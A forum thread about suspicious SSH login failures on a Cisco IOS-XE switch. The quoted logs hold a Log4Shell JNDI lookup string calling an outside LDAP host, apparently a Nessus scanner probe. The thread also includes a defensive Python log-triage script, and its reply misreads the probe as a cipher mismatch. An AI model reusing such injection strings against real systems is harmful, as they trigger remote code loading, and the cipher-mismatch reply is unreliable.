lupineye, posted April 13, 2022 (edited)

These logs keep showing up on a C9K IOS-XE gateway, and I can't tell whether this is the Nessus application running an SSH vulnerability test against the switch or an attack.

The NOC has no information and knows nothing about it; they only send out automated messages like the following:

QID-375964 VIT3546584 Oracle Java SE Critical Patch Update - October 2021 (CPUOCT2021)

The source IP rotates among a few specific IPs. It does not appear to change completely at random.

================================================================================================
651640: Apr 12 08:10:37.945 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:37 UTC Tue Apr 12 2022
651641: Apr 12 08:10:40.096 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:40 UTC Tue Apr 12 2022
651642: Apr 12 08:10:43.412 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:43 UTC Tue Apr 12 2022
651643: Apr 12 08:10:46.849 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:46 UTC Tue Apr 12 2022
651644: Apr 12 08:10:52.318 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:52 UTC Tue Apr 12 2022
651645: Apr 12 08:10:55.647 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:55 UTC Tue Apr 12 2022
651646: Apr 12 08:11:04.941 UTC: %SSH-3-NO_MATCH: No matching cipher found: client ${jndi:ldap://log4shell-ssh-awXxH9QLamxmzdZVHtGQ${lower:ten}.w.nessus.org/nessus} server aes128-ctr,aes192-ctr,aes256-ctr
651647: Apr 12 08:11:42.645 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:42 UTC Tue Apr 12 2022
651648: Apr 12 08:11:45.582 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:45 UTC Tue Apr 12 2022
651649: Apr 12 08:11:48.088 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:48 UTC Tue Apr 12 2022
651650: Apr 12 08:11:50.289 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:50 UTC Tue Apr 12 2022
651651: Apr 12 08:11:53.681 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:53 UTC Tue Apr 12 2022
===============================================================================================================

>>>>>> Normally, when the wrong credentials are used, it is logged like this:

653123: Apr 13 16:42:54.754 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.120.1.2] [localport: 22] [Reason: Login Authentication Failed] at 16:42:54 UTC Wed Apr 13 2022
653124: Apr 13 16:42:54.979 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: f-nmsauto] [Source: 10.120.1.2] [localport: 22] at 16:42:54 UTC Wed Apr 13 2022

Edited April 13, 2022 by lupineye

Master (Administrators), posted April 14, 2022

On April 13, 2022 at 9:41 AM, lupineye said:
651646: Apr 12 08:11:04.941 UTC: %SSH-3-NO_MATCH: No matching cipher found: client ${jndi:ldap://log4shell-ssh-awXxH9QLamxmzdZVHtGQ${lower:ten}.w.nessus.org/nessus} server aes128-ctr,aes192-ctr,aes256-ctr

"You got this error because there is no matching cipher suite between the two. From the list of supported ciphers it doesn't look like another networking device or appliance, I don't recall seeing too many openssh ciphers on them."

There is information that explains it this way. I think you will need to compare the encryption methods between the client trying to connect via SSH and the Cisco device. If the problem still occurs even though they are the same, please post again.
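
One way to triage the logs from the question, as an added example that is not part of the original thread: a Python script that counts failed logins per source and pulls the host out of the ${jndi:...} string in the %SSH-3-NO_MATCH line. The function names, the two-minute correlation window and the assumed year 2022 are choices made for this example.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample: five of the log lines quoted in the thread, unmodified.
SAMPLE = """\
651645: Apr 12 08:10:55.647 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:55 UTC Tue Apr 12 2022
651646: Apr 12 08:11:04.941 UTC: %SSH-3-NO_MATCH: No matching cipher found: client ${jndi:ldap://log4shell-ssh-awXxH9QLamxmzdZVHtGQ${lower:ten}.w.nessus.org/nessus} server aes128-ctr,aes192-ctr,aes256-ctr
651647: Apr 12 08:11:42.645 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:42 UTC Tue Apr 12 2022
653123: Apr 13 16:42:54.754 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.120.1.2] [localport: 22] [Reason: Login Authentication Failed] at 16:42:54 UTC Wed Apr 13 2022
653124: Apr 13 16:42:54.979 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: f-nmsauto] [Source: 10.120.1.2] [localport: 22] at 16:42:54 UTC Wed Apr 13 2022
"""

HEAD = re.compile(r"^\d+: (\w{3} +\d+ [\d:.]+) UTC: %([A-Z_]+-\d-[A-Z_]+): (.*)$")
SOURCE = re.compile(r"\[Source: ([^\]]+)\]")
LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
JNDI = re.compile(r"\$\{jndi:\w+://([^/}\s:]+)", re.I)

def resolve(text):
    """Collapse ${lower:x}/${upper:x} lookups so split keywords become visible."""
    prev = None
    while prev != text:
        prev = text
        text = LOOKUP.sub(lambda m: getattr(m.group(2), m.group(1).lower())(), text)
    return text

def triage(log, window=timedelta(minutes=2), year=2022):
    """Count failed logins per source and tie each JNDI probe to nearby sources.
    %SSH-3-NO_MATCH carries no source address, so attribution is by time only."""
    failures, probes = [], []
    for line in log.splitlines():
        m = HEAD.match(line.strip())
        if not m:
            continue
        # The header timestamp has no year; `year` is an assumption of this example.
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S.%f")
        if m.group(2) == "SEC_LOGIN-4-LOGIN_FAILED":
            src = SOURCE.search(m.group(3))
            failures.append((ts, src.group(1) if src else "unknown"))
        hit = JNDI.search(resolve(m.group(3)))
        if hit:
            probes.append((ts, hit.group(1)))
    report = {"failed_by_source": dict(Counter(s for _, s in failures)), "probes": []}
    for ts, host in probes:
        near = sorted({s for t, s in failures if abs(t - ts) <= window})
        report["probes"].append({"time": ts, "callback_host": host, "sources_nearby": near})
    return report

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The report gives the addresses to check against the scanner inventory; the time-based link between the probe and a source is an indication and still has to be confirmed with whoever operates the scanner.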